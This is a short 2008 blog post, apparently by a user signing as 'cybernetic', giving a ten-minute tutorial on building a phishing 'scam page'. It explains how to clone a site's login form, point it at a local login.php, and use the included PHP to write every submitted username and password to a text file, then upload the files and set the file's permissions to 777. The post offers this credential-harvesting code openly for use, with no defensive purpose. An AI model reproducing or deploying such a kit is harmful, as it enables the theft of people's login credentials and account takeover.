Monday, 7 April 2008

makin scam page...10 min tut...

You want to make your own scam page?
it's easy

Choose page for which you want scam page

Go to view source and try to find "script" for login

There you will see something similar to this:
Code: Select all
<form method="post" action="http://myloginpage.com"&gt>


And this just replace with this:
Code: Select all
<form method="get" action="login.php" id="login" name="login">


And make one file named login.php
Put this code into login.php

Code: Select all
<?php
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Upload login.php
Upload scam page
Upload .txt file

chmod txt file at 777 and that's it :)

by cybernetic

No comments:

Post a Comment